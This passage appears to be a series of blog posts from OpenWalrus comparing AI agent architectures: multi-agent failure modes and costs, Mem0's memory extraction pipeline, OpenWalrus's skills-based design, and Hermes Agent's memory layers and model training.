downstream checks they didn't know existed, because agents make implicit assumptions
about state, ordering, and validation without explicit instructions."

The failure mode compounds. From Towards Data Science:

"When one agent decides something incorrectly, downstream agents assume it's true,
and by discovery time, 10 downstream decisions are built on that error."

This is why Devin avoids parallel agents entirely. It's not a capability limitation —
it's an architectural choice based on the failure modes.

Cost and latency explode

Multi-agent token consumption doesn't scale linearly. The GitHub Blog documents the
production gap:

3-agent workflows that cost $5–50 in demos reach $18,000–90,000/month at scale
Response times jump from 1–3 seconds to 10–40 seconds per request
Reliability drops from 95–98% in pilots to 80–87% under production load

The underlying cause: every inter-agent handoff requires token-intensive context reconstruction.
The parent encodes its state into a prompt; the subagent re-processes the entire relevant context
from scratch. Multiplied across many agents and many calls, the token budget explodes.

Cursor's background agents add a different dimension: cloud environment reliability.
User-reported failures include Docker builds failing during apt-get update, git branch
push failures, connection dropouts that stall agents mid-task, and cloud environment
initialization errors. The compute is remote and shared, so failures that don't exist
locally appear at scale.

Where each system struggles

[Interactive chart — see original post]
The chart reflects the research above. Claude Code is strong on environment reliability
(local execution) but has no mechanism for context continuity or parallel conflict handling.
Cursor partially addresses parallelism through Git worktrees but has the opposite reliability
profile — cloud execution introduces environment failures. Devin avoids parallel agents
entirely and invests heavily in error recovery through its review agent, which is why
it scores high on those axes but zero on parallel conflict handling.

No system in the current survey scores well across all five dimensions. Context continuity
is the universal weak spot.

Why better models don't fix this

The 2026 AI Agent Report
is direct:

"Most multi-agent failures aren't caused by weak models — they're caused by weak
reasoning architecture. Orchestrating multiple agents with divergent goals, conflicting
information, and cascading failures requires architectural discipline."

Code quality compounds the issue. A January 2026 Stack Overflow Blog analysis
found that AI-generated code includes bugs at 1.5–2x the rate of human-written code when
supervision gaps exist, with 3x the readability issues. Multi-agent workflows create
supervision gaps by design — no single reviewer sees the whole picture.

The integration layer is where failures originate: how agents hand off state, coordinate
writes, report progress, and signal when they're stuck. Models are getting better;
orchestration architecture largely isn't.

What the research says works

The GitHub Blog identifies several patterns that prevent the most common failures:

Typed schemas for inter-agent messages. Without explicit contracts between agents,
every handoff is a natural language interpretation problem. Typed schemas eliminate a
class of coordination errors before they happen.

Explicit handoff contracts. The orchestrator maintains state; workers are stateless
and only know what the orchestrator tells them per-invocation. This is the "Main Agent
as Project Manager" pattern formalized. It's more overhead to design but dramatically
reduces inter-agent confusion.

Budget meters and permission gates. Catching runaway token consumption before it
becomes a $90,000 surprise requires active monitoring. Permission gates before
destructive or expensive operations give the system a chance to pause.

Observable task state. When agents can report their current status to a shared
registry — not just to their own context — the orchestrator and user can see what's
happening and intervene. This is the problem the
task registry design addresses.

Checkpointing over re-discovery. Explicit handoff documents (a structured summary
of what's been done, what constraints apply, what decisions have been made) reduce
context amnesia. The cost of writing a handoff document is cheaper than the cost of
a subagent re-exploring the same territory.

Mem0: what three memory scopes actually cost

clearloop — Sun, 15 Mar 2026 17:52:16 +0000

Every agent memory system eventually faces the same question: when should the agent forget? Mem0's answer is to never let it come to that — an LLM-powered extraction pipeline watches every conversation, pulls out candidate memories, deduplicates them against a vector store, and asks a second LLM to decide whether each one should be added, updated, deleted, or ignored. It's the most sophisticated memory management pipeline we've examined. It's also the most expensive.

We dug into how Mem0 actually works: the extraction pipeline, the three memory scopes, the benchmark claims, and the infrastructure required to run it. Here's what we found.

The extraction pipeline

Most agent memory systems store what the agent explicitly asks to store. Mem0 takes a different approach: it watches every conversation and automatically extracts memories the agent never asked for.

How memories get created

Three inputs feed the extraction pipeline:

Latest exchange — the most recent user message and agent response
Rolling summary — a compressed summary of recent conversation context
Recent messages — the last m messages for continuity

An LLM processes these inputs and extracts candidate memories — concise facts, not full text. "User prefers TypeScript" rather than the full conversation where they mentioned it.

The four-way LLM decision

For each candidate memory, a second LLM call runs:

Vector similarity search retrieves existing memories similar to the candidate
The LLM sees the candidate and its nearest neighbors and decides one of four actions:
- ADD — genuinely new information, store it
- UPDATE — augment an existing memory with more recent or detailed info
- DELETE — the new information contradicts an existing memory, remove the old one
- NOOP — the fact already exists or is irrelevant, skip it

This is where the cost lives. Every memory write requires two LLM calls (extract + decide), plus a vector similarity search. Over a 100-turn conversation, that's 200+ LLM calls just for memory management.

Graph-based conflict resolution

Mem0's graph variant (Mem0ᵍ) adds a layer on top: a Conflict Detector that flags overlapping or contradictory nodes and edges, and an Update Resolver that determines merges, invalidations, or skips. This supports temporal reasoning — marking relationships as obsolete without deleting them.

Diagram — see original post

The pipeline is technically impressive. The question is whether the overhead is worth it for most agent use cases.

Three memory scopes

Mem0 organizes memory into three scopes that map to different temporal horizons.

Conversation memory (short-term)

In-flight messages within a single turn. What was just said. This is what every agent framework has — the context window itself.

Session memory

Short-lived context within a single task or channel. Tool outputs, intermediate calculations, what the agent is currently focused on. Dies when the session ends.

User memory (long-term)

Persists across all conversations with a specific user. This is the most interesting scope — it contains:

Factual memory: preferences, account details, domain knowledge
Episodic memory: summaries of past interactions
Semantic memory: relationships between concepts for reasoning

The system stores each scope separately and merges them during query. The search pipeline pulls from all scopes, ranking user memories first, then session notes, then raw history.

The scope assignment problem: when the extraction pipeline identifies a new memory, which scope does it belong to? "User prefers TypeScript" is clearly user-scoped. "The current deployment is failing" is session-scoped. But "user is working on a migration to Rust" sits in a gray zone — it's user-level context, but it's temporary. Misclassification in either direction causes problems: user-scoped memories that should be session-scoped pollute all future sessions; session-scoped memories that should be user-scoped disappear when the session ends.

The benchmark claims

Mem0's research paper (Chhikara et al., April 2025) reports strong numbers.

LOCOMO results

On the LOCOMO (Long Conversation Memory) benchmark, Mem0 scores 66.9% on an LLM-as-Judge evaluation, compared to 52.9% for OpenAI's memory. The graph variant (Mem0ᵍ) adds roughly 2% on top.

Token savings and latency

Metric	Mem0 claim	Baseline	Source
Token savings	90% reduction	Full-context (26K → 1.8K tokens)	arXiv:2504.19413
Latency (P95)	91% reduction	Full-context (17.12s → 1.44s)	arXiv:2504.19413
Accuracy	26% relative improvement	LLM-as-Judge vs OpenAI memory	arXiv:2504.19413
LOCOMO F1	66.9%	LongMemEval benchmark	arXiv:2504.19413

What the paper actually measures

The 90% token savings compares selective memory retrieval (pull only relevant memories) against stuffing the full conversation history into the context window. This is a real comparison, but the baseline is generous — few production systems stuff raw history without any summarization. Against a properly compacted conversation, the savings would be smaller.

The paper doesn't report the total cost including the extraction pipeline itself. The 90% savings is on the retrieval side only. If the extraction pipeline adds 200 LLM calls over a 100-turn conversation, the total cost equation changes significantly.

The practical deployments the paper cites (RevisionDojo, OpenNote) report 40% token reduction — a more realistic figure that likely includes extraction overhead.

Infrastructure requirements

Self-hosted stack

Running Mem0 yourself requires:

Docker & Docker Compose v2 — orchestration layer
PostgreSQL + pgvector — vector storage
Neo4j — graph database for relationship memory
OpenAI API key — default LLM and embedding model (swappable for Ollama for fully local inference)

That's four external services before you store a single memory. The documentation estimates 2-5 minutes for initial setup, but production deployment (persistence volumes, auth, CORS, monitoring) is significantly more involved. The default configuration has no authentication or CORS restrictions — the docs explicitly warn about needing a reverse proxy before network exposure.

Managed service

Mem0's managed service at app.mem0.ai reduces this to a single API key. SOC 2 compliant, with audit logs and workspace governance. This is where the infrastructure complexity disappears — but the LLM extraction cost remains.
[Interactive chart — see original post]

How it compares

	Mem0	Walrus	Graphiti (Zep)	Claude Code
Memory scopes	3 (conversation, session, user)	1 (unified graph)	1 (temporal KG)	1 (files on disk)
Storage backend	24+ vector stores + Neo4j	LanceDB + lance-graph	Neo4j	Markdown files
Extraction	LLM pipeline (extract + decide)	Agent tools (remember/recall)	LLM + temporal edges	Manual / auto-memory
Conflict resolution	Graph Conflict Detector + Update Resolver	Upsert (last write wins)	Bi-temporal invalidation	Manual edit
External dependencies	PostgreSQL, Neo4j, vector DB, OpenAI	None (embedded)	Neo4j server	None
LLM calls per write	2 (extract + decide)	0	1 (extraction)	0
Deployment	Docker Compose or managed cloud	Single binary	Docker + Neo4j	CLI / IDE
License	Apache 2.0	MIT	MIT	Proprietary

The radar shows the core tradeoff: Mem0 dominates on deduplication and conflict resolution. Walrus dominates on setup simplicity and schema flexibility. Neither wins everywhere — they're optimizing for different constraints.

What walrus does differently

Walrus bets on a single memory layer: LanceDB + lance-graph with three tables (entities, relations, journals) and six tools (remember, recall, relate, connections, compact, distill). No extraction pipeline, no scope disambiguation, no LLM calls per write.

Diagram — see original post

The write path tells the story. Mem0 adds four steps between "something worth remembering happened" and "memory stored." Walrus has one: the agent calls remember and the fact goes into the graph.

Where this works: for agents that run tens to hundreds of sessions, the agent itself can manage deduplication through careful key naming and recall before remember. The LLM is already reasoning about the conversation — asking it to also decide what's worth storing is a smaller cognitive burden than running a separate extraction pipeline.

Where this breaks: at thousands of sessions with the same user, manual deduplication stops scaling. If the agent uses different keys for the same concept across sessions, duplicates accumulate. Mem0's similarity-threshold deduplication (0.85 cosine similarity triggers a semantic merge) catches these automatically. Walrus doesn't — yet.

We explored these memory architecture tradeoffs across five products in persistent agent memory research. Hermes Agent takes yet another approach with five memory layers — procedural skills, user modeling via Honcho, and FTS5 for cross-session recall. The context compaction survey covers how frameworks handle the overflow problem that drives memory systems in the first place.
[Interactive chart — see original post]

Open questions

Does the extraction pipeline pay for itself? Mem0 makes 2 LLM calls per memory write. At GPT-4o pricing, a 100-turn conversation costs roughly $0.30–0.80 just in memory management. The 90% token savings on retrieval are real — but do they offset the extraction cost? The paper reports savings on the retrieval side only, not total cost including extraction.
What happens when the conflict resolver gets it wrong? The graph-based Conflict Detector + Update Resolver is LLM-powered, which means probabilistic. If it incorrectly marks "prefers async/await in TypeScript" as conflicting with "prefers callbacks in Python" (different languages, different contexts), the user loses a valid memory. The paper reports aggregate accuracy but not conflict resolution precision.
Do most agents need three memory scopes? Conversation, session, and user memory is a clean taxonomy. But scope assignment is itself an LLM decision — misclassification creates problems in both directions. For many agent use cases (coding assistants, chatbots, task automation), a single-layer approach with explicit agent control may be simpler and sufficient.
Can a single-layer approach match Mem0 at scale? At 10,000 memories across 500 sessions, deduplication isn't optional — it's survival. Does walrus need to add dedup at the storage layer, or can smarter recall + remember patterns handle it?
Is the managed service the real product? Self-hosted Mem0 requires Docker + PostgreSQL + Neo4j + OpenAI. The managed service requires an API key. The complexity gap between the two is enormous. The open-source version may be more lead generator than standalone product — a pattern increasingly common in AI infrastructure.

Less code, more skills

clearloop — Sun, 15 Mar 2026 17:51:33 +0000

OpenWalrus is a single binary. No Docker, no microservices, no plugin
runtime with a package manager. One cargo install, one process, and
you have a fully autonomous AI agent runtime on your machine.

Keeping it that way while scaling to every possible use case is the
central design tension of the project. And it's the same tension every
agent framework faces: how do you stay small without becoming limited?

Our answer is a design principle we keep coming back to: less code,
more skills.

The framework bloat trap

Agent frameworks grow fast. A team ships a coding agent. Users ask for
web browsing, so they add a browser tool. Users ask for memory, so they
add a memory subsystem. Users ask for RAG, so they bundle an embedding
model. Users ask for customization, so they add configuration layers —
CLAUDE.md, .cursorrules, AGENTS.md, TOOLS.md, MEMORY.md, memory banks,
auto-generated observations, reflections, compressed histories.

Every feature request answered with framework code makes the repo bigger,
the binary heavier, the surface area wider, and the maintenance burden
steeper. Eventually the framework is doing so much that it becomes the
bottleneck — slow to build, hard to debug, impossible to audit.

The system prompt suffers the same inflation. Research shows frontier LLMs
reliably follow around 150-200 instructions. Past that, adherence degrades
— sometimes exponentially for smaller models. Every feature that injects
more context into the prompt makes the agent worse at everything else.

We've watched this happen. We hit the ceiling ourselves. And we stopped
pushing through it.

The principle: small core, open surface

The walrus repo should stay compact. Not because we're lazy, but because
a compact core is a correct core — easier to audit, easier to trust,
easier to run on constrained hardware.

But a compact core only works if the surface area for extension is wide
open. This is where skills come in.

Diagram — see original post

The core handles what only the core can handle: LLM inference, agent
lifecycle, tool dispatch, and a
graph memory layer backed by
LanceDB + lance-graph.
Both are embedded, Rust-native, and compile into the walrus binary — no
separate database server, no Docker. This is the code we maintain.
It should be small, correct, and boring.

Skills and MCP servers handle everything else. A skill is a behavioral
template — instructions and patterns that tell an agent how to approach a
domain, including which entity types and relationships to extract from
conversations. MCP servers can register new entity types at runtime.
The community writes them. Users mix and match them. The repo doesn't grow.

This is the Unix philosophy applied to agent runtimes. Small tools that
compose, not monolithic systems that configure.

Three layers of extension

The "small core, open surface" idea plays out in a consistent
three-layer model across every walrus subsystem — tools, memory, and
entity types all follow the same pattern.

Diagram — see original post

Layer 1 — Framework built-ins. The things only the core can provide.
A filesystem tool, a shell tool, an HTTP client, four memory tools
(remember, recall, relate, forget), and three base entity types
(Agent, User, Episode). This is the floor — always available,
always correct.

Layer 2 — Skills. Behavioral templates that tell the agent how to
approach a domain. A coding skill declares entity types like File,
TestFailure, ArchDecision and teaches the agent how to extract them.
A research skill declares Paper, Topic, Citation. A DevOps skill
teaches the agent to compose kubectl and terraform commands. Skills
are a few hundred lines of behavioral description, not compiled code.

Layer 3 — MCP servers. External capabilities connected at runtime.
A Jira MCP registers Ticket, Sprint, Epic as first-class entities.
A GitHub MCP adds PR, Issue, Commit. The agent's capability surface
grows without any framework changes.

Every subsystem follows this pattern. Memory isn't special. Tools aren't
special. Entity types aren't special. The extension model is the same
everywhere — which means learning it once is enough.

Memory: the first test of the principle

Memory was where we first applied "less code, more skills" — and where
the principle proved itself.

Our survey of existing memory systems
showed every product building a comprehensive memory subsystem. Claude Code
with markdown files and auto-memory. OpenClaw with SQLite + vectors and
hybrid search. ChatGPT with a proprietary backend. Each is a bet on one
particular memory layout being right for most users.

Instead of building a universal memory framework with config files and
journal directories, we collapsed everything into a single layer: a
temporal knowledge graph backed by
LanceDB + lance-graph. Agent identity, user preferences, conversation
episodes, extracted entities — all graph nodes. Four tools to interact
with it. Skills define what to extract; the core handles how.

The memory schema grows with the agent's capability surface. Install a
coding skill and File, TestFailure become extractable entity types.
Connect a Jira MCP and Ticket, Sprint appear. No framework changes.
No config files. The three-layer extension model does the work.

Read the full deep-dive in
Graph + vector: how OpenWalrus agents remember.

Beyond memory

"Less code, more skills" isn't just a memory strategy. It's how we think
about every feature request.

When someone asks "can walrus browse the web?" — the answer isn't a
built-in browser engine. It's an HTTP tool and a web browsing skill that
knows how to navigate, extract, and summarize.

When someone asks "can walrus manage my infrastructure?" — the answer
isn't a built-in cloud SDK. It's a shell tool and a DevOps skill that
knows how to compose kubectl, terraform, and aws commands.

When someone asks "can walrus do X?" — the answer is almost always:
the tools already exist, we just need a skill.

This keeps the repo compact. Every skill is a few hundred lines of
behavioral description, not thousands of lines of compiled code. The
core stays auditable. The binary stays small. And the ecosystem of what
walrus can do grows without bound — because the community builds it,
not us.

The tradeoff

This isn't free. Pushing intelligence to skills means:

The core tools have to be excellent. If the built-in tools are unreliable, no skill can compensate. This is where our engineering effort goes — making the foundational layer rock-solid.
Quality varies. Community skills won't all be good. Some will be brilliant, most will be adequate, a few will be wrong. Curation and testing matter.
Discovery is harder. Users need to find the right skill for their use case. This is a community infrastructure problem we haven't fully solved yet.
Skills need good documentation. A skill is only as useful as its instructions are clear. Bad behavioral descriptions produce bad agent behavior — garbage in, garbage out.

But the alternative — baking every capability into the framework — is
worse. It makes the repo unmaintainable, the binary bloated, and the
system prompt overloaded. We'd rather have a small, correct core and a
messy ecosystem than a bloated, fragile framework and no ecosystem at all.

Stop injecting, start enabling

The system prompt was never meant to be a database. It was meant to be
a brief set of instructions — who you are, how you behave, what tools
you have. The moment we started using it as a persistence layer, we
created a problem that no amount of engineering can solve.

The fix isn't more framework code. It's better tools and shareable skills.

Keep the core compact. Keep the surface open. Let agents and communities
build the intelligence. Less code, more skills.

Get started with OpenWalrus →

Originally published at OpenWalrus.

Hermes memory: five layers, one learning loop

clearloop — Sun, 15 Mar 2026 17:51:22 +0000

Hermes Agent remembers by doing. Complete a complex task, and it writes a SKILL.md — a step-by-step recipe it can retrieve next time. Ask it something personal, and Honcho derives a Theory of Mind snapshot from the conversation. Search for last week's work, and FTS5 pulls it from a SQLite index. Five memory layers, each solving a different temporal problem. No other open-source agent runtime attempts this much.

We examined Hermes Agent's memory architecture in depth — not the models or the terminal backends (we covered those in the runtime survey), but the memory system specifically. How the five layers interact, what each one costs, and what's missing.

Five layers, explained

Layer 1: Short-term inference memory

The context window. Every agent has this — it's the transformer's working memory for the current session. Hermes compresses at 50% context utilization (configurable) and caps tool orchestration at 90 iteration steps by default.

Nothing survives a restart. This layer exists to be lost.

Layer 2: Procedural skill documents

This is what makes Hermes's memory unique. When the agent completes a complex task — debugging a microservice, optimizing a pipeline — it autonomously writes a SKILL.md file capturing the step-by-step solution.

The format follows the agentskills.io standard:

Frontmatter: name (1-64 chars, lowercase + hyphens), description (1-1024 chars), optional license, compatibility, allowed-tools
Directory structure: SKILL.md plus optional scripts/, references/, assets/ subdirectories
Progressive disclosure: metadata loaded always (~100 tokens), full SKILL.md loaded on activation (under 5,000 tokens recommended), resources loaded on-demand

The creation trigger is the least documented part. It appears to be complexity-based — some heuristic of iteration count, tool calls, or solution novelty. The threshold isn't public, which makes it hard to predict when the agent will create a skill and when it won't.

Skills are stored locally at ~/.hermes/memories/skills/. They're plain files — inspectable, editable, portable. The agentskills.io standard means skills created in Hermes can theoretically work in 11+ other tools that adopt the spec.

Layer 3: Contextual persistence

A vector store indexes skill documents for workflow retrieval. When a new task resembles a past task, the system retrieves the relevant skill and uses it as a starting scaffold.

This is where layers 2 and 3 interact: layer 2 creates skills, layer 3 makes them findable. Without contextual persistence, the agent would have to know which skill to load by name. With it, the agent describes the task, and the closest matching skill surfaces.

Layer 4: User modeling via Honcho

Honcho is an external service from Plastic Labs that models users through what they call "dialectical reasoning." It doesn't store conversations — it derives conclusions from them.

The data model is peer-centric with four primitives:

Primitive	Purpose	Scope
Workspace	Multi-tenant isolation	Top-level container
Peer	Entity representation	Both users and agents
Session	Interaction thread	Temporal boundary
Message	Atomic data unit	Conversations, events, documents

The key insight is that both users and agents are "peers" — this enables multi-participant reasoning, not just one-way user profiling.

How it reasons: Custom reasoning models process messages asynchronously in the background, deriving Representations — Theory of Mind snapshots about each peer. These aren't raw transcripts. They're conclusions: "User has 10+ years Rust experience," "User prefers async communication," "User is working on a migration project."

How agents query it: Three retrieval methods:

get_context() — returns a combination of messages, conclusions, and summaries up to a token budget. ~200ms latency.
search() — hybrid text + semantic search across workspace, peer, or session scope.
Dialectic chat — natural language queries to Honcho. The agent asks "What does this user care about?" and gets a reasoned answer, not a database row.

Configuration: enabled via user_profile_enabled: true and a HONCHO_API_KEY in ~/.hermes/config.yaml. This is the only layer that requires an external service.

Layer 5: Full-text search (FTS5)

SQLite FTS5 indexes all past interactions with LLM-powered summarization. Not raw logs — the system summarizes sessions before indexing, reducing noise and context pollution.

This layer answers temporal queries: "What did I do last Tuesday?" "What was the error I hit in the auth service last week?" Cross-session recall that the context window can't provide and that skill documents don't capture (skills are procedural, not episodic).

Diagram — see original post

Every layer feeds back into the context window. The closed loop: tasks produce skills, skills improve future tasks, Honcho builds an evolving user model, FTS5 provides temporal recall. Each session is supposed to make the next one better.

The closed learning loop

The theory is compelling. An agent that gets better over time:

Agent completes a task → writes SKILL.md
Next similar task → vector store retrieves the skill → agent starts from a scaffold instead of zero
Honcho observes the user → derives preferences → future sessions are personalized
FTS5 indexes everything → temporal recall available across sessions

The question is whether this compounds in practice. We found no published benchmarks measuring skill reuse rates, user model accuracy over time, or degradation curves. The loop is well-designed in theory — the evidence gap is how it performs after months of heavy use.

Honcho: the user modeling question

Honcho's approach is fundamentally different from both Mem0's scope-based model and walrus's graph-based model.

Mem0 organizes memory by scope (conversation, session, user) and uses an LLM extraction pipeline to decide what goes where. The intelligence is in the extraction.

Walrus uses a single graph (LanceDB + lance-graph) with typed entities and explicit agent tools. The intelligence is in the agent — it decides what to remember.

Honcho derives conclusions from conversations without storing them. The intelligence is in the reasoning model that produces Representations. It doesn't store "user said they prefer TypeScript in message #47." It stores "user prefers TypeScript" as a derived fact.

This is closer to how humans remember — we forget the conversation, remember the conclusion. The risk is the same as with human memory: the conclusion might be wrong, and you can't go back to the source to verify.

Does it work? Honcho claims improved personalization and context-awareness. Honcho 3.0 added faster context retrieval and smarter embedding reuse. But we found no published A/B tests or benchmarks comparing agent performance with and without Honcho enabled. The contribution of user modeling to actual task completion is an open empirical question.
[Interactive chart — see original post]
The radar shows Hermes dominating on procedural memory and user modeling — the two capabilities that distinguish it from every other system. The gap on forgetting/decay is the most striking: Hermes scores 1 out of 10. It has no mechanism to forget.

Skill lifecycle: creation, retrieval, decay

Skills are Hermes's most original contribution. But the lifecycle has gaps.

Creation: autonomous, triggered by complexity heuristics. The threshold is undocumented — this makes it unpredictable. An agent might create a skill for a trivial task or miss a complex one.

Retrieval: vector similarity via the contextual persistence layer. The right skill surfaces for similar tasks. This works well when skill names and descriptions are distinctive. It works less well when skills overlap (three skills for "deploy to staging" created at different times with slightly different approaches).

What's missing:

Deduplication: No mechanism to detect that two skills solve the same problem. Mem0 uses cosine similarity (0.85 threshold) to merge near-duplicates. Hermes doesn't.
Versioning: No way to track skill evolution. If the agent rewrites a skill, the old version is gone.
Expiration: Skills never expire. A skill for "deploy to staging via Jenkins" persists long after you've migrated to GitHub Actions.
Conflict detection: Two skills with contradictory advice ("always use yarn" vs "always use pnpm") can coexist without any system-level awareness. [Interactive chart — see original post] Hermes leads on auto-creation and portability (agentskills.io). Mem0 leads on deduplication. Nobody scores well on versioning. The expiration row is telling — Hermes scores 0, meaning skills accumulate indefinitely.

What's missing: forgetting

None of the five layers have a documented forgetting mechanism.

Skills accumulate in ~/.hermes/memories/skills/ with no pruning
FTS5 index grows with every session, no summarization decay
Honcho representations persist indefinitely — derived facts are never invalidated
Vector store indexes grow with the skill collection

Contrast this with:

Mem0's DELETE operation — the extraction pipeline can explicitly remove contradicted memories
Walrus's compact and distill tools — imperfect, but the agent can at least consolidate and prune
Cognitive science — Ebbinghaus decay curves suggest unused memories should fade. No agent framework implements this

The absence of forgetting is a design choice, not an oversight. Hermes bets that more memory is always better than less. This works at small scale. At 10,000+ skills and years of FTS5 logs, the signal-to-noise ratio is an open question. We explored the broader patterns of memory growth in our survey of persistent agent memory, and the context compaction survey covers how frameworks handle the related overflow problem.

Infrastructure cost

Hermes's memory is cheaper to run than it looks. Three of five layers are local:

Layer	Runs locally	External service	LLM calls
Context window	Yes	None	0 per op
Skills (SKILL.md)	Yes	None	1 (creation only)
Contextual (vector)	Yes	None	0 per op
Honcho (user model)	No	Honcho API	1+ per session
FTS5 (search)	Yes	None	0 per query

Configuration lives in ~/.hermes/config.yaml:

memory:
  memory_enabled: true
  user_profile_enabled: true    # requires HONCHO_API_KEY
  memory_char_limit: 2200       # ~800 tokens for MEMORY.md
  user_char_limit: 1375         # ~500 tokens for USER.md

Each layer is independently disableable. You can run Hermes with just skills and FTS5 (fully local, no external services) or add Honcho for user modeling. The skip_memory parameter in the AIAgent() constructor disables persistence entirely.
[Interactive chart — see original post]
The cost profile is bimodal: four layers are effectively free (local files, local SQLite), one layer (Honcho) requires an external service with LLM calls. FTS5 has the highest storage growth because it indexes every session.

How it compares

	Hermes Agent	Mem0	Walrus
Memory layers	5	3 scopes	1
Procedural memory	SKILL.md (autonomous)	None	None
User modeling	Honcho (dialectical reasoning)	User scope (LLM extraction)	Graph entities (agent-driven)
Cross-session recall	FTS5 + LLM summarization	Vector similarity retrieval	Graph traversal + journals
Deduplication	None	LLM-powered (cosine 0.85)	Upsert by key
Forgetting	None	DELETE operation	compact / distill tools
External services	1 (Honcho, optional)	4 self-hosted / 1 managed	0
Skill portability	agentskills.io (11+ tools)	None	None
LLM calls per write	1 (skill creation)	2 (extract + decide)	0

What walrus does differently

Walrus's single layer — LanceDB + lance-graph with six tools (remember, recall, relate, connections, compact, distill) — is a deliberate bet against complexity.

No skill documents, no user modeling service, no FTS5 index. The agent decides what's worth remembering and writes it to the graph. The agent queries the graph when it needs context. The agent compacts when memory grows.

Where Hermes wins: procedural memory is genuinely valuable. An agent that writes down how it solved a problem and reuses that solution later is a meaningful capability. Walrus doesn't have this — the agent can remember facts and relate entities, but it can't capture a multi-step procedure as a reusable unit.

Where walrus wins: zero external services, zero LLM calls per write, one mental model. When something goes wrong with memory in walrus, you inspect one graph. When something goes wrong in Hermes, you debug across five layers — was the skill created? Was it indexed? Did Honcho derive the right conclusion? Did FTS5 find the right session?

The deeper question: is five layers the right number? Could Hermes achieve 90% of the benefit with two layers (skills + FTS5) and skip the vector store, Honcho, and the complexity they add? The answer depends on whether user modeling and contextual persistence produce measurable improvements — and right now, that evidence doesn't exist publicly.

Open questions

Does the closed learning loop actually compound? No published benchmarks measure skill reuse rates or user model accuracy over time. The architecture is sound — does it work after 500 sessions?
What triggers skill creation? The complexity threshold is undocumented. Without knowing when the agent will or won't create a skill, developers can't rely on skill accumulation as a feature.
Can five layers stay consistent? A skill says "use yarn." The user tells the agent "I switched to pnpm." The FTS5 index has sessions using both. Does the agent reconcile these, or does it depend on which layer it queries first?
Does Honcho user modeling measurably improve task performance? Dialectical reasoning is a novel approach. But the value proposition — "the agent understands you better over time" — needs evidence. A/B test results, task completion rate comparisons, anything quantitative.
What happens after six months of heavy use with no forgetting? Skills accumulate, FTS5 grows, Honcho representations multiply. At what point does the noise outweigh the signal? Does retrieval quality degrade as the corpus grows?

Hermes Agent: what Nous Research built

clearloop — Sun, 15 Mar 2026 17:50:40 +0000

Update (v0.0.7): The comparison table in this post lists walrus as having "built-in" local inference. As of v0.0.7, local inference was removed — OpenWalrus now connects to remote providers only. Memory and search are now external WHS services.

In February 2026, Nous Research released Hermes Agent — an open-source (MIT), Python-based agent runtime with persistent memory, autonomous skill creation, and local inference support via Ollama, vLLM, or llama.cpp. It positions itself "between a Claude Code style CLI and an OpenClaw style messaging platform agent." Six thousand GitHub stars in the first month.

We dug into how it actually works: the training pipeline that produces its models, the multi-level memory system that lets it learn across sessions, and the agentskills.io standard that makes its skills portable to 11+ other tools. Here's what we found.

The model stack

Hermes Agent runs on Hermes 3 and Hermes 4, a family of fine-tuned open-weight models from Nous Research. The models and the agent runtime are separate projects — Hermes Agent can use any OpenAI-compatible endpoint, but the Hermes models are purpose-built for agentic workloads.

Hermes 3 (August 2024)

Fine-tuned on Llama 3.1 at three scales: 8B, 70B, and 405B parameters. The technical report details the training:

Data: ~390M tokens of synthetically generated responses (not human feedback). 69% output tokens, 31% instruction tokens. Constructed March–August 2024.
Training: Two-phase — supervised fine-tuning (SFT) followed by direct preference optimization (DPO).
Packing: 96% sample packing efficiency at 8192-token sequences via Flash Attention 2 with attention masking to prevent cross-sample contamination.
Format: ChatML (<|im_start|> / <|im_end|> delimiters) for OpenAI API compatibility.
Function calling: Trained on the hermes-function-calling-v1 dataset — single and multi-turn function calling, structured JSON outputs, agentic scenarios. Tools specified in <tools> XML tags, invoked via JSON with arguments and name fields.

The predecessor model (Hermes 2 Pro) achieved 90% function calling accuracy compared to 60–70% for general-purpose models of similar size. Hermes 3 improved on this across multiple benchmarks while adding enhanced code generation and multi-turn conversation handling.

Hermes 4 (August 2025)

A significant jump. The technical report documents two major innovations:

Hybrid reasoning: Models toggle between standard responses and explicit deliberation using <think>...</think> tags. Thinking traces can extend up to 16,000 tokens. Users choose whether they want fast answers or detailed reasoning — the model adapts rather than always defaulting to verbose chain-of-thought.

DataForge: A graph-based synthetic data generation system that replaced the manual curation pipeline. Each node in a DAG performs a struct-to-struct transformation — converting simple seed data into complex training formats (e.g., Wikipedia article → rap song → Q&A pair). An LLM judge evaluates outputs on coherence, relevance, complexity, style, and tone, iterating until the sample passes or hits a maximum retry count.

The numbers tell the scaling story: Hermes 3 used 1M samples and 1.2B tokens. Hermes 4 uses ~5M samples and ~60B tokens — 5x more samples, 50x more tokens. Of those 5M samples, 3.5M are reasoning-heavy (intentionally longer) and 1.6M are non-reasoning.

Hermes 4.3 (36B) is particularly interesting: it's fine-tuned on ByteDance Seed 36B, not Llama. This breaks the assumption that all Hermes models share a Llama backbone. It achieves a 78.4% reduction in overlong reasoning generation on AIME'24 with only a 4.7% accuracy cost — solving the "model thinks for too long" problem that plagues many reasoning models.

Atropos

The training uses Atropos, Nous Research's distributed reinforcement learning framework. It's not standard RLHF — it's a rollout handler that manages asynchronous coordination across potentially thousands of distributed workers, addressing the challenge of highly variable LLM generation times. In Hermes 4 training, Atropos drives rejection sampling across ~1,000 task-specific verifiers to filter for high-quality reasoning trajectories.
[Interactive chart — see original post]

Agent architecture

The ReAct loop

Hermes Agent implements the classic ReAct pattern: Observation (read terminal output, file contents) → Reasoning (analyze state against goals) → Action (execute commands, call tools) → Loop. The innovation isn't the loop itself — it's what surrounds it.

Multi-level memory

Five layers of persistence, from ephemeral to permanent:

Short-term inference memory: Standard transformer context within a single session. Nothing survives restart.
Procedural skill documents: Persistent markdown files (SKILL.md) capturing step-by-step solutions to completed tasks. Created autonomously when the agent finishes something complex — debugging a microservice, optimizing a pipeline. Unlike standard RAG (which retrieves disjointed snippets), skills maintain cohesive procedural understanding.
Contextual persistence: Searchable vector store indexing skill documents for workflow retrieval. When a new task resembles a past task, the relevant skill is retrieved and used as a starting scaffold.
User modeling via Honcho: An entity-centric memory library from Plastic Labs. Represents both users and agents as "peers." Asynchronously reasons about peer psychology from messages, deriving facts and storing them in reserved collections. No messages = no reasoning = no memory. The model evolves over time: preferences, work patterns, domain expertise.
Full-text search (FTS5): SQLite-based searchable database of all past interactions with LLM-powered summarization. Cross-session recall for "what did I do last Tuesday?" queries.

The closed learning loop ties these together: the agent completes tasks → creates skill documents → skills improve during subsequent use → periodic nudges prompt the agent to persist valuable knowledge → FTS5 enables cross-session recall → Honcho builds an evolving model of the user. Each session makes the next one better.

